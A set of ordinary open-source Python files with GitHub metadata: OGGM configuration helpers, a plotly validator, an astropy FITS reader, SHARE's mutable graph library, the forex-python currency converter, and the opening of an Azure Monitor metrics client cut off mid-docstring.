l0 = list(glob.glob(os.path.join(tmpdir, '*' + ending)))
l0.sort(key=os.path.getctime)
lru = LRUFileCache(l0, maxsize=maxsize)
LRUHANDLERS[k] = lru
return lru
def set_intersects_db(path_or_gdf=None):
"""Set the glacier intersection database for OGGM to use.
It is now set automatically by the
:func:`oggm.workflow.init_glacier_directories` task, but setting it
manually can be useful for a slightly faster run initialization.
See :func:`oggm.utils.get_rgi_intersects_region_file` for how to obtain
such data.
Parameters
----------
path_or_gdf : str of geopandas.GeoDataframe
the intersects file to use
"""
global PARAMS
PARAMS.do_log = False
if PARAMS['use_intersects'] and path_or_gdf is not None:
if isinstance(path_or_gdf, str):
PARAMS['intersects_gdf'] = gpd.read_file(path_or_gdf)
else:
PARAMS['intersects_gdf'] = path_or_gdf
else:
PARAMS['intersects_gdf'] = pd.DataFrame()
PARAMS.do_log = True
def reset_working_dir():
"""Deletes the content of the working directory. Careful: cannot be undone!
"""
if PATHS['working_dir']:
if os.path.exists(PATHS['working_dir']):
shutil.rmtree(PATHS['working_dir'])
os.makedirs(PATHS['working_dir'])
def pack_config():
"""Pack the entire configuration in one pickleable dict."""
return {
'IS_INITIALIZED': IS_INITIALIZED,
'PARAMS': PARAMS,
'PATHS': PATHS,
'LRUHANDLERS': LRUHANDLERS,
'DATA': DATA,
'BASENAMES': dict(BASENAMES),
'DL_VERIFIED': DL_VERIFIED,
'DEM_SOURCE_TABLE': DEM_SOURCE_TABLE
}
def unpack_config(cfg_dict):
"""Unpack and apply the config packed via pack_config."""
global IS_INITIALIZED, PARAMS, PATHS, BASENAMES, LRUHANDLERS, DATA
global DL_VERIFIED, DEM_SOURCE_TABLE
IS_INITIALIZED = cfg_dict['IS_INITIALIZED']
PARAMS = cfg_dict['PARAMS']
PATHS = cfg_dict['PATHS']
LRUHANDLERS = cfg_dict['LRUHANDLERS']
DATA = cfg_dict['DATA']
DL_VERIFIED = cfg_dict['DL_VERIFIED']
DEM_SOURCE_TABLE = cfg_dict['DEM_SOURCE_TABLE']
# BASENAMES is a DocumentedDict, which cannot be pickled because
# set intentionally mismatches with get
BASENAMES = DocumentedDict()
for k in cfg_dict['BASENAMES']:
BASENAMES[k] = (cfg_dict['BASENAMES'][k], 'Imported Pickle')
def set_manager(manager):
"""Sets a multiprocessing manager to use for shared dicts"""
global DL_VERIFIED, DEM_SOURCE_TABLE, DATA
if manager:
new_dict = manager.dict()
new_dict.update(DL_VERIFIED)
DL_VERIFIED = new_dict
new_dict = manager.dict()
new_dict.update(DEM_SOURCE_TABLE)
DEM_SOURCE_TABLE = new_dict
new_dict = manager.dict()
new_dict.update(DATA)
DATA = new_dict
else:
DL_VERIFIED = dict(DL_VERIFIED)
DEM_SOURCE_TABLE = dict(DEM_SOURCE_TABLE)
DATA = dict(DATA)
def add_to_basenames(basename, filename, docstr=''):
"""Add an entry to the list of BASENAMES.
BASENAMES are access keys to files available at the gdir level.
Parameters
----------
basename : str
the key (e.g. 'dem', 'model_flowlines')
filename : str
the associated filename (e.g. 'dem.tif', 'model_flowlines.pkl')
docstr : str
the associated docstring (for documentation)
"""
global BASENAMES
if '.' not in filename:
raise ValueError('The filename needs a proper file suffix!')
BASENAMES[basename] = (filename, docstr)
| {
"content_hash": "a2ebb53659650ad808da92bda536fec7",
"timestamp": "",
"source": "github",
"line_count": 907,
"max_line_length": 87,
"avg_line_length": 37.187431091510476,
"alnum_prop": 0.6201784814254796,
"repo_name": "bearecinos/oggm",
"id": "a589f28ff3fd73667f2ea323f550101b5957cff8",
"size": "33729",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "oggm/cfg.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Dockerfile",
"bytes": "384"
},
{
"name": "Python",
"bytes": "1852706"
},
{
"name": "Shell",
"bytes": "1201"
}
],
"symlink_target": ""
} |
import _plotly_utils.basevalidators
class TickwidthValidator(_plotly_utils.basevalidators.NumberValidator):
def __init__(
self, plotly_name="tickwidth", parent_name="layout.scene.zaxis", **kwargs
):
super(TickwidthValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "plot"),
min=kwargs.pop("min", 0),
role=kwargs.pop("role", "style"),
**kwargs
)
| {
"content_hash": "cfc5cb7a6b9423ea8a4b5aba247981f4",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 81,
"avg_line_length": 34.06666666666667,
"alnum_prop": 0.5870841487279843,
"repo_name": "plotly/python-api",
"id": "78f0faff0d705d2f4e095f8e490a0781d14a0d62",
"size": "511",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "packages/python/plotly/plotly/validators/layout/scene/zaxis/_tickwidth.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "6870"
},
{
"name": "Makefile",
"bytes": "1708"
},
{
"name": "Python",
"bytes": "823245"
},
{
"name": "Shell",
"bytes": "3238"
}
],
"symlink_target": ""
} |
import argparse
from astropy.io import fits
# PARSE OPTIONS ###############################################################
parser = argparse.ArgumentParser(description="An astropy snippet")
parser.add_argument("filearg", nargs=1, metavar="FILE", help="the FITS file to process")
args = parser.parse_args()
file_path = args.filearg[0]
# PRINT GENERAL HDU INFOS #####################################################
print()
print(80 * '*')
print()
fits.info(file_path)
print()
print(80 * '*')
print()
# READ DATA ###################################################################
# Open the FITS file
hdu_list = fits.open(file_path)
# For each blocks
for hdu_index, hdu in enumerate(hdu_list):
print("HDU {}".format(hdu_index), 40 * '*')
print()
# Print header
print("* HEADERS")
print()
header = hdu.header
for key, value in header.items():
print(key, ":", value)
print()
# Print columns
if not hdu.is_image:
print("* COLUMNS")
print()
columns = hdu.columns
print(columns)
print()
print(columns.names)
print()
columns.info()
print()
# Print data
print("* DATA")
print()
data = hdu.data # "hdu.data" is a Numpy Array
print(data)
print()
# Close the FITS file
hdu_list.close()
| {
"content_hash": "5bd5c59afe24ea3d5e0b9fff58856db0",
"timestamp": "",
"source": "github",
"line_count": 63,
"max_line_length": 88,
"avg_line_length": 21.22222222222222,
"alnum_prop": 0.5198204936424832,
"repo_name": "jeremiedecock/snippets",
"id": "f9d57773d0f7a5efce2b87c39d6da4c2d19cd59e",
"size": "1697",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "python/astropy/fits/read_fits_table.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "AMPL",
"bytes": "4294"
},
{
"name": "Batchfile",
"bytes": "6779"
},
{
"name": "C",
"bytes": "102107"
},
{
"name": "C++",
"bytes": "320943"
},
{
"name": "CMake",
"bytes": "11424"
},
{
"name": "CSS",
"bytes": "21121"
},
{
"name": "Cython",
"bytes": "21"
},
{
"name": "Dockerfile",
"bytes": "1818"
},
{
"name": "Fortran",
"bytes": "633"
},
{
"name": "Gnuplot",
"bytes": "39999"
},
{
"name": "Go",
"bytes": "3166"
},
{
"name": "Groovy",
"bytes": "3009"
},
{
"name": "HTML",
"bytes": "138995"
},
{
"name": "IDL",
"bytes": "43"
},
{
"name": "Java",
"bytes": "120221"
},
{
"name": "JavaScript",
"bytes": "32342"
},
{
"name": "Jinja",
"bytes": "206"
},
{
"name": "Jupyter Notebook",
"bytes": "95991"
},
{
"name": "Lua",
"bytes": "200"
},
{
"name": "M4",
"bytes": "111"
},
{
"name": "MATLAB",
"bytes": "31972"
},
{
"name": "Makefile",
"bytes": "81307"
},
{
"name": "OpenSCAD",
"bytes": "14995"
},
{
"name": "PHP",
"bytes": "94"
},
{
"name": "Perl",
"bytes": "46"
},
{
"name": "Processing",
"bytes": "208"
},
{
"name": "Prolog",
"bytes": "454"
},
{
"name": "Python",
"bytes": "1685966"
},
{
"name": "R",
"bytes": "76"
},
{
"name": "Raku",
"bytes": "43"
},
{
"name": "Ruby",
"bytes": "42"
},
{
"name": "Scheme",
"bytes": "649"
},
{
"name": "Shell",
"bytes": "52865"
},
{
"name": "Smalltalk",
"bytes": "55"
},
{
"name": "TeX",
"bytes": "1189"
},
{
"name": "Vue",
"bytes": "49445"
},
{
"name": "XSLT",
"bytes": "1816"
}
],
"symlink_target": ""
} |
from enum import Enum, auto
from operator import attrgetter
import networkx as nx
import pendulum
import uuid
from share.exceptions import ShareException
from share.schema import ShareV2Schema
from share.schema.exceptions import SchemaKeyError
from share.schema.shapes import AttributeDataType, RelationShape
from share.util import TopologicalSorter
class MutableGraphError(ShareException):
pass
class PrivateNodeAttrs(Enum):
TYPE = auto()
class EdgeAttrs(Enum):
FROM_NAME = auto()
TO_NAME = auto()
def resolve_field(type_name, field_name):
try:
return ShareV2Schema().get_field(type_name, field_name)
except SchemaKeyError:
return None
# TODO: ImmutableGraph (don't allow mutation and error on non-existent attr/relation)
class MutableGraph(nx.DiGraph):
"""NetworkX DiGraph with some SHARE-specific features.
Nodes in the DiGraph are string IDs. Uses MutableNode as a convenience interface to access/manipulate nodes.
Provides the abstraction of named edges:
* Each named edge has two names: `from_name` and `to_name`
* the "from" node knows the edge by its `from_name`
* the "to" node knows the edge by its `to_name`
* correspond to a foreign key and its related field
* All outgoing edges from a node must be unique on `from_name`
Example: Find all URIs identifying a work
```
work = graph.get_node(work_id)
uris = [identifier['uri'] for identifier in work['identifiers']]
```
Example: Remove all orphan nodes (no incoming or outgoing edges)
```
orphans = graph.filter_nodes(lambda n: not graph.degree(n))
for orphan in orphans:
graph.remove_node(orphan.id)
```
"""
@classmethod
def from_jsonld(cls, nodes):
"""Create a mutable graph from a list of JSON-LD-style dicts.
"""
central_node_id = None
if isinstance(nodes, dict):
central_node_id = nodes.get('central_node_id', None)
nodes = nodes['@graph']
graph = cls()
if central_node_id:
graph.central_node_id = central_node_id
for n in nodes:
node_id, node_type = None, None
attrs = {}
for k, v in n.items():
if k == '@id':
node_id = v
elif k == '@type':
node_type = v
elif isinstance(v, dict) and k != 'extra':
graph.add_node(v['@id'], v['@type'])
attrs[k] = v['@id']
elif isinstance(v, list):
pass # Don't bother with incoming edges, let the other node point here
else:
attrs[k] = v
if not node_id or not node_type:
raise MutableGraphError('Nodes must have id and type')
graph.add_node(node_id, node_type, attrs)
return graph
def __init__(self):
super().__init__()
self.changed = False
self.central_node_id = None
def to_jsonld(self, in_edges=True):
"""Return a dictionary with '@graph' and 'central_node_id' keys that will serialize
to json-ld conforming with the SHARE schema
in_edges (boolean): Include lists of incoming edges. Default True.
"""
return {
'central_node_id': self.central_node_id,
'@graph': [
node.to_jsonld(in_edges=in_edges)
for node in self.topologically_sorted()
],
}
def add_node(self, node_id, node_type, attrs=None):
"""Create a node in the graph.
node_id (hashable): Unique node ID. If None, generate a random ID.
node_type (str): The node's @type value
attrs: Dictionary of attributes or relations corresponding to fields on the node's model
Returns a MutableNode wrapper for the new node.
"""
if node_type is None:
raise MutableGraphError('Must provide `node_type` to MutableGraph.add_node')
self.changed = True
if node_id is None:
node_id = '_:{}'.format(uuid.uuid4())
super().add_node(node_id)
return MutableNode(self, node_id, node_type, attrs)
def get_node(self, node_id):
"""Get a node by ID.
node_id (hashable): Unique node ID
Returns a MutableNode wrapper for the node, or None.
"""
if node_id in self:
return MutableNode(self, node_id)
return None
def remove_node(self, node_id, cascade=True):
"""Remove a node and its incoming/outgoing edges.
node_id (hashable): Unique node ID
cascade (boolean): Also remove nodes with edges which point to this node. Default True.
"""
self.changed = True
to_remove = list(self.predecessors(node_id)) if cascade else []
super().remove_node(node_id)
for from_id in to_remove:
self.remove_node(from_id, cascade)
def filter_nodes(self, filter):
"""Filter the nodes in the graph.
filter (callable): When called with a MutableNode argument, return something truthy to
include it in the filtered list, or something falsy to omit it.
Returns list of MutableNodes.
"""
# TODO figure out common sorts of filters, make kwargs for them and optimize
return [node for node in self if filter(node)]
def filter_type(self, node_type):
# TODO make a sort of index dict, mapping type to nodes
return self.filter_nodes(lambda n: n.type == node_type.lower())
def filter_by_concrete_type(self, concrete_type):
# TODO make a sort of index dict, mapping concrete_type to nodes
lower_concrete_type = concrete_type.lower()
return self.filter_nodes(lambda n: n.concrete_type == lower_concrete_type)
def add_named_edge(self, from_id, to_id, from_name, to_name):
"""Add a named edge.
from_id (hashable): Unique ID for the node this edge comes from
to_id (hashable): Unique ID for the node this edge points to
from_name (str): Name of the edge on its 'from' node (must be unique on the node)
to_name (str): Name of the edge on its 'to' node
"""
if any(data.get(EdgeAttrs.FROM_NAME) == from_name
for _, _, data in self.out_edges(from_id, data=True)):
raise MutableGraphError('Out-edge names must be unique on the node')
self.changed = True
self.add_edge(from_id, to_id)
self.edges[from_id, to_id][EdgeAttrs.FROM_NAME] = from_name
self.edges[from_id, to_id][EdgeAttrs.TO_NAME] = to_name
def remove_named_edge(self, from_id, from_name):
"""Remove a named edge.
from_id (hashable): Unique ID for the node this edge comes from
from_name (str): Name of the edge on its 'from' node
"""
self.changed = True
try:
to_id = next(
to_id for _, to_id, data
in self.out_edges(from_id, data=True)
if data.get(EdgeAttrs.FROM_NAME) == from_name
)
self.remove_edge(from_id, to_id)
except StopIteration:
pass
def resolve_named_out_edge(self, from_id, from_name):
"""Get the node a named edge points to.
from_id (hashable): Unique ID for the node this edge comes from
from_name (str): Name of the edge on its 'from' node
Returns a MutableNode wrapper for the node the edge points to.
"""
try:
return next(
MutableNode(self, to_id) for _, to_id, data
in self.out_edges(from_id, data=True)
if data.get(EdgeAttrs.FROM_NAME) == from_name
)
except StopIteration:
return None
def resolve_named_in_edges(self, to_id, to_name):
"""Get all nodes which point to a node with the same named edges.
to_id (hashable): Unique ID for the node these edges point to
to_name (str): Name of the edges on their 'to' node
Returns list of MutableNode wrappers for the nodes these edges come from.
"""
return [
MutableNode(self, from_id) for from_id, _, data
in self.in_edges(to_id, data=True)
if data.get(EdgeAttrs.TO_NAME) == to_name
]
def named_out_edges(self, from_id):
"""Get all outgoing named edges from a node.
from_id (hashable): Unique node ID
Returns dict with:
keys: `from_name` of each outgoing edge
values: MutableNode wrapper for the node each edge points to
"""
return {
data[EdgeAttrs.FROM_NAME]: MutableNode(self, to_id) for _, to_id, data
in self.out_edges(from_id, data=True)
if data.get(EdgeAttrs.FROM_NAME) is not None
}
def named_in_edges(self, to_id):
"""Get all incoming named edges to a node.
to_id (hashable): Unique node ID
Returns dict of edges with:
keys: `to_name` of each incoming edge
values: list of MutableNode wrappers for the nodes each edge comes from
"""
in_edges = {}
for from_id, _, data in self.in_edges(to_id, data=True):
to_name = data.get(EdgeAttrs.TO_NAME)
if to_name is not None:
in_edges.setdefault(to_name, []).append(MutableNode(self, from_id))
return in_edges
def merge_nodes(self, from_node, into_node):
"""Merge a nodes attrs and edges into another node.
"""
if from_node.concrete_type != into_node.concrete_type:
raise MutableGraphError('Cannot merge nodes of different types')
self.changed = True
# into_node will have the more specific typ
if from_node.schema_type.distance_from_concrete_type > into_node.schema_type.distance_from_concrete_type:
from_node, into_node = into_node, from_node
self._merge_node_attrs(from_node, into_node)
self._merge_in_edges(from_node, into_node)
self._merge_out_edges(from_node, into_node)
from_node.delete(cascade=False)
def topologically_sorted(self):
return TopologicalSorter(
sorted(self, key=attrgetter('id')),
dependencies=lambda n: sorted(self.successors(n.id)),
key=attrgetter('id'),
).sorted()
def __iter__(self):
return (MutableNode(self, node_id) for node_id in super().__iter__())
def __contains__(self, n):
if isinstance(n, MutableNode):
n = n.id
return super().__contains__(n)
def __bool__(self):
return bool(len(self))
def _merge_node_attrs(self, from_node, into_node):
into_attrs = into_node.attrs()
for k, new_val in from_node.attrs().items():
if k in into_attrs:
old_val = into_attrs[k]
if new_val == old_val:
continue
field = resolve_field(into_node.type, k)
if getattr(field, 'data_type', None) == AttributeDataType.DATETIME:
new_val = max(pendulum.parse(new_val), pendulum.parse(old_val)).isoformat()
else:
new_val = self._merge_value(new_val, old_val)
into_node[k] = new_val
def _merge_value(self, value_a, value_b):
# use the longer value, or the first alphabetically if they're the same length
return sorted([value_a, value_b], key=lambda x: (-len(str(x)), str(x)))[0]
def _merge_in_edges(self, from_node, into_node):
for in_edge_name, source_nodes in self.named_in_edges(from_node.id).items():
inverse_relation = resolve_field(from_node.type, in_edge_name).inverse_relation
for source_node in source_nodes:
source_node[inverse_relation] = into_node
def _merge_out_edges(self, from_node, into_node):
into_edges = self.named_out_edges(into_node.id)
for edge_name, from_target in self.named_out_edges(from_node.id).items():
into_target = into_edges.get(edge_name)
if from_target != into_target:
self.merge_nodes(from_target, into_target)
def get_central_node(self, guess=False):
if guess and self.central_node_id is None:
self._guess_central_node()
return self.get_node(self.central_node_id)
def _guess_central_node(self):
# use a heuristic to guess the "central" node, when it's not given
# (the whole idea of guessing here is a hack to handle old data --
# hopefully we can get away from it eventually)
def centrality_heuristic(work_node):
# return a tuple of numbers (and booleans), where
# higher numbers (including `True`s) => more likely central
has_identifiers = bool(work_node['identifiers'])
has_contributor_info = bool(work_node['agent_relations'])
how_much_total_info = (
len(work_node.attrs())
+ len(self.in_edges(work_node.id))
+ len(self.out_edges(work_node.id))
)
how_much_contributor_info = len(work_node['agent_relations'])
has_parent_work = any(
relation.type == 'ispartof'
for relation in work_node['outgoing_creative_work_relations']
)
return (
has_identifiers,
has_contributor_info,
how_much_total_info,
how_much_contributor_info,
has_parent_work,
)
work_nodes = self.filter_by_concrete_type('abstractcreativework')
if work_nodes:
# get the work node with the most attrs+relations
work_nodes.sort(key=centrality_heuristic, reverse=True)
if (
len(work_nodes) > 1
and centrality_heuristic(work_nodes[0]) == centrality_heuristic(work_nodes[1])
):
raise MutableGraphError(f'cannot guess central node -- multiple candidates ({work_nodes[0].id}, {work_nodes[1].id})')
central_node = work_nodes[0]
self.central_node_id = central_node.id
class MutableNode:
"""Convenience wrapper around a node in a MutableGraph.
"""
def __new__(cls, graph, node_id, *args, **kwargs):
if node_id not in graph:
return graph.add_node(node_id, *args, **kwargs)
return super().__new__(cls)
def __init__(self, graph, node_id, type_name=None, attrs=None):
self.__graph = graph
self.__id = node_id
self.__attrs = graph.nodes[node_id]
if type_name:
self.type = type_name
if attrs:
self.update(attrs)
@property
def id(self):
return self.__id
@property
def graph(self):
return self.__graph
@property
def type(self):
return self.__attrs[PrivateNodeAttrs.TYPE]
@type.setter
def type(self, value):
self.graph.changed = True
schema_type = ShareV2Schema().get_type(value)
self.__attrs.update({
PrivateNodeAttrs.TYPE: schema_type.name.lower(),
})
@property
def concrete_type(self):
return self.schema_type.concrete_type.lower()
@property
def schema_type(self):
return ShareV2Schema().get_type(self.type)
def attrs(self):
return {
k: v for k, v in self.__attrs.items()
if k not in PrivateNodeAttrs
}
def relations(self, in_edges=True, jsonld=False):
relations = {}
for from_name, node in self.graph.named_out_edges(self.id).items():
relations[from_name] = node.to_jsonld(ref=True) if jsonld else node
if in_edges:
for to_name, nodes in self.graph.named_in_edges(self.id).items():
sorted_nodes = sorted(nodes, key=lambda n: n.id)
relations[to_name] = [n.to_jsonld(ref=True) for n in sorted_nodes] if jsonld else sorted_nodes
return relations
def __getitem__(self, key):
"""Get an attribute value or related node(s).
key (str): Name of an attribute, outgoing named edge, or incoming named edge.
If key is the name of a plain attribute in the SHARE schema, return that attribute's value.
If key is the name of an outgoing edge, return a MutableNode that edge points to
If key is the name of incoming edges, return a list of MutableNodes those edges come from
"""
field = resolve_field(self.type, key)
if field and field.is_relation and field.name != 'extra':
if field.relation_shape == RelationShape.MANY_TO_ONE:
return self.graph.resolve_named_out_edge(self.id, field.name)
if field.relation_shape == RelationShape.ONE_TO_MANY:
return self.graph.resolve_named_in_edges(self.id, field.name)
if field.relation_shape == RelationShape.MANY_TO_MANY:
m2m_related_nodes = self._resolve_many_to_many(
field.through_concrete_type,
field.incoming_through_relation,
field.outgoing_through_relation,
)
is_reflexive = (field.related_concrete_type.lower() == self.concrete_type)
if is_reflexive:
# for a reflexive m2m, include nodes related in either direction
m2m_related_nodes.update(self._resolve_many_to_many(
field.through_concrete_type,
# outgoing/incoming swapped
field.outgoing_through_relation,
field.incoming_through_relation,
))
return list(m2m_related_nodes)
raise MutableGraphError('Only many-to-one, one-to-many, and non-reflexive many-to-many relations allowed')
return self.__attrs.get(field.name if field else key)
def _resolve_many_to_many(self, through_concrete_type, incoming_through_relation, outgoing_through_relation):
incoming_edge_name = ShareV2Schema().get_field(
through_concrete_type,
incoming_through_relation
).inverse_relation
through_nodes = self.graph.resolve_named_in_edges(self.id, incoming_edge_name)
return set(
self.graph.resolve_named_out_edge(through_node.id, outgoing_through_relation)
for through_node in through_nodes
)
def __setitem__(self, key, value):
"""Set an attribute value or add an outgoing named edge.
key (str): Name of an attribute or an outgoing edge.
If key is the name of a plain attribute in the SHARE schema, set that attribute's value.
If key is the name of an outgoing edge, expect `value` to be a node ID or a MutableNode. Add an edge from this node to that one.
If key is the name of incoming edges, raise an error.
If value is None, same as `del node[key]`
"""
self.graph.changed = True
field = resolve_field(self.type, key)
field_name = field.name if field else key
if value is None:
del self[field_name]
return
if field and field.is_relation:
if field.relation_shape != RelationShape.MANY_TO_ONE:
raise MutableGraphError('Can set only many-to-one relations')
to_id = value.id if hasattr(value, 'id') else value
self.graph.remove_named_edge(self.id, field_name)
self.graph.add_named_edge(self.id, to_id, field_name, field.inverse_relation)
else:
self.__attrs[field_name] = value
def __delitem__(self, key):
"""Delete an attribute value or outgoing named edge.
key (str): Name of an attribute or an outgoing edge.
If key is the name of an attribute in the SHARE schema, delete that attribute from this node.
If key is the name of an outgoing edge, remove that edge.
If key is the name of incoming edges, raise an error.
"""
self.graph.changed = True
field = resolve_field(self.type, key)
field_name = field.name if field else key
if field and field.is_relation:
if field.relation_shape != RelationShape.MANY_TO_ONE:
raise MutableGraphError('Can delete only many-to-one relations')
self.graph.remove_named_edge(self.id, field_name)
elif field_name in self.__attrs:
del self.__attrs[field_name]
def update(self, attrs):
for k, v in attrs.items():
self[k] = v
def delete(self, cascade=True):
"""Remove this node from its graph.
cascade (boolean): Also remove nodes with edges which point to this node. Default True.
"""
self.graph.changed = True
self.graph.remove_node(self.id, cascade)
self.__graph = None
def to_jsonld(self, ref=False, in_edges=False):
ld_node = {
'@id': self.id,
'@type': self.type,
}
if not ref:
ld_node.update(self.relations(in_edges=in_edges, jsonld=True))
ld_node.update(self.attrs())
return ld_node
def __eq__(self, other):
return isinstance(other, self.__class__) and other.graph is self.graph and other.id == self.id
def __hash__(self):
return hash(self.id)
def __str__(self):
return '<{} id({}) type({})>'.format(self.__class__.__name__, self.id, self.type)
__repr__ = __str__
| {
"content_hash": "b1d7621f6ff38e220ed31abe0a3256c9",
"timestamp": "",
"source": "github",
"line_count": 581,
"max_line_length": 136,
"avg_line_length": 37.44750430292599,
"alnum_prop": 0.5890058372018201,
"repo_name": "aaxelb/SHARE",
"id": "21c7094fb83c7b02598f51d2f51d078ea7a941f0",
"size": "21757",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "share/util/graph.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "3321"
},
{
"name": "Dockerfile",
"bytes": "1143"
},
{
"name": "Gherkin",
"bytes": "4346"
},
{
"name": "HTML",
"bytes": "4834"
},
{
"name": "Python",
"bytes": "1450482"
},
{
"name": "Shell",
"bytes": "408"
}
],
"symlink_target": ""
} |
import os
from decimal import Decimal
import requests
import simplejson as json
class RatesNotAvailableError(Exception):
"""
Custome Exception when https://theforexapi.com is Down and not available for currency rates
"""
pass
class DecimalFloatMismatchError(Exception):
"""
A float has been supplied when force_decimal was set to True
"""
pass
class Common:
def __init__(self, force_decimal=False):
self._force_decimal = force_decimal
def _source_url(self):
return "https://theforexapi.com/api/"
def _get_date_string(self, date_obj):
if date_obj is None:
return 'latest'
date_str = date_obj.strftime('%Y-%m-%d')
return date_str
def _decode_rates(self, response, use_decimal=False, date_str=None):
if self._force_decimal or use_decimal:
decoded_data = json.loads(response.text, use_decimal=True)
else:
decoded_data = response.json()
# if (date_str and date_str != 'latest' and date_str != decoded_data.get('date')):
# raise RatesNotAvailableError("Currency Rates Source Not Ready")
return decoded_data.get('rates', {})
def _get_decoded_rate(
self, response, dest_cur, use_decimal=False, date_str=None):
return self._decode_rates(
response, use_decimal=use_decimal, date_str=date_str).get(
dest_cur, None)
class CurrencyRates(Common):
def get_rates(self, base_cur, date_obj=None):
date_str = self._get_date_string(date_obj)
payload = {'base': base_cur, 'rtype': 'fpy'}
source_url = self._source_url() + date_str
response = requests.get(source_url, params=payload)
if response.status_code == 200:
rates = self._decode_rates(response, date_str=date_str)
return rates
raise RatesNotAvailableError("Currency Rates Source Not Ready")
def get_rate(self, base_cur, dest_cur, date_obj=None):
if base_cur == dest_cur:
if self._force_decimal:
return Decimal(1)
return 1.
date_str = self._get_date_string(date_obj)
payload = {'base': base_cur, 'symbols': dest_cur, 'rtype': 'fpy'}
source_url = self._source_url() + date_str
response = requests.get(source_url, params=payload)
if response.status_code == 200:
rate = self._get_decoded_rate(response, dest_cur, date_str=date_str)
if not rate:
raise RatesNotAvailableError("Currency Rate {0} => {1} not available for Date {2}".format(
base_cur, dest_cur, date_str))
return rate
raise RatesNotAvailableError("Currency Rates Source Not Ready")
def convert(self, base_cur, dest_cur, amount, date_obj=None):
if isinstance(amount, Decimal):
use_decimal = True
else:
use_decimal = self._force_decimal
if base_cur == dest_cur: # Return same amount if both base_cur, dest_cur are same
if use_decimal:
return Decimal(amount)
return float(amount)
date_str = self._get_date_string(date_obj)
payload = {'base': base_cur, 'symbols': dest_cur, 'rtype': 'fpy'}
source_url = self._source_url() + date_str
response = requests.get(source_url, params=payload)
if response.status_code == 200:
rate = self._get_decoded_rate(
response, dest_cur, use_decimal=use_decimal, date_str=date_str)
if not rate:
raise RatesNotAvailableError("Currency {0} => {1} rate not available for Date {2}.".format(
source_url, dest_cur, date_str))
try:
converted_amount = rate * amount
return converted_amount
except TypeError:
raise DecimalFloatMismatchError(
"convert requires amount parameter is of type Decimal when force_decimal=True")
raise RatesNotAvailableError("Currency Rates Source Not Ready")
_CURRENCY_FORMATTER = CurrencyRates()
get_rates = _CURRENCY_FORMATTER.get_rates
get_rate = _CURRENCY_FORMATTER.get_rate
convert = _CURRENCY_FORMATTER.convert
class CurrencyCodes:
def __init__(self):
self.__currency_data = None
@property
def _currency_data(self):
if self.__currency_data is None:
file_path = os.path.dirname(os.path.abspath(__file__))
with open(file_path + '/raw_data/currencies.json') as f:
self.__currency_data = json.loads(f.read())
return self.__currency_data
def _get_data(self, currency_code):
currency_dict = next((item for item in self._currency_data if item["cc"] == currency_code), None)
return currency_dict
def _get_data_from_symbol(self, symbol):
currency_dict = next((item for item in self._currency_data if item["symbol"] == symbol), None)
return currency_dict
def get_symbol(self, currency_code):
currency_dict = self._get_data(currency_code)
if currency_dict:
return currency_dict.get('symbol')
return None
def get_currency_name(self, currency_code):
currency_dict = self._get_data(currency_code)
if currency_dict:
return currency_dict.get('name')
return None
def get_currency_code_from_symbol(self, symbol):
currency_dict = self._get_data_from_symbol(symbol)
if currency_dict:
return currency_dict.get('cc')
return None
_CURRENCY_CODES = CurrencyCodes()
get_symbol = _CURRENCY_CODES.get_symbol
get_currency_name = _CURRENCY_CODES.get_currency_name
get_currency_code_from_symbol = _CURRENCY_CODES.get_currency_code_from_symbol
| {
"content_hash": "b7b143c53b80782b8629ca8edb15880f",
"timestamp": "",
"source": "github",
"line_count": 162,
"max_line_length": 107,
"avg_line_length": 35.7962962962963,
"alnum_prop": 0.6137265045697534,
"repo_name": "MicroPyramid/forex-python",
"id": "390a11a175c40ef6ed47c577d21425bfe6193dbf",
"size": "5799",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "forex_python/converter.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "32379"
}
],
"symlink_target": ""
} |
import uuid
from msrest.pipeline import ClientRawResponse
from .. import models
class MetricsOperations(object):
"""MetricsOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An objec model deserializer.
:ivar api_version: Client Api Version. Constant value: "2017-05-01-preview".
"""
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.api_version = "2017-05-01-preview"
self.config = config
def list(
self, resource_uri, timespan=None, interval=None, metric=None, aggregation=None, top=None, orderby=None, filter=None, result_type=None, custom_headers=None, raw=False, **operation_config):
"""**Lists the metric values for a resource**.
:param resource_uri: The identifier of the resource.
:type resource_uri: str
:param timespan: The timespan of the query. It is a string with the
following format 'startDateTime_ISO/endDateTime_ISO'.
:type timespan: str
:param interval: The interval (i.e. timegrain) of the query.
:type interval: timedelta
:param metric: The name of the metric to retrieve.
:type metric: str
:param aggregation: The list of aggregation types (comma separated) to
retrieve.
:type aggregation: str
:param top: The maximum number of records to retrieve.
Valid only if $filter is specified.
Defaults to 10.
:type top: float
:param orderby: The aggregation to use for sorting results and the
direction of the sort.
Only one order can be specified.
Examples: sum asc.
:type orderby: str
:param filter: The **$filter** is used to reduce the set of metric
data returned.<br>Example:<br>Metric contains metadata A, B and
C.<br>- Return all time series of C where A = a1 and B = b1 or
b2<br>**$filter=A eq ‘a1’ and B eq ‘b1’ or B eq ‘b2’ and C eq
‘*’**<br>- Invalid variant:<br>**$filter=A eq ‘a1’ and B eq ‘b1’ and C
eq ‘*’ or B = ‘b2’**<br>This is invalid because the logical or
operator cannot separate two different metadata names.<br>- Return all
time series where A = a1, B = b1 and C = c1:<br>**$filter=A eq ‘a1’
and B eq ‘b1’ and C eq ‘c1’**<br>- Return all time series where A =
a1<br>**$filter=A eq ‘a1’ and B eq ‘*’ and C eq ‘*’**.
:type filter: str
:param result_type: Reduces the set of data collected. The syntax
allowed depends on the operation. See the operation's description for
details. Possible values include: 'Data', 'Metadata'
:type result_type: str or ~azure.mgmt.monitor.models.ResultType
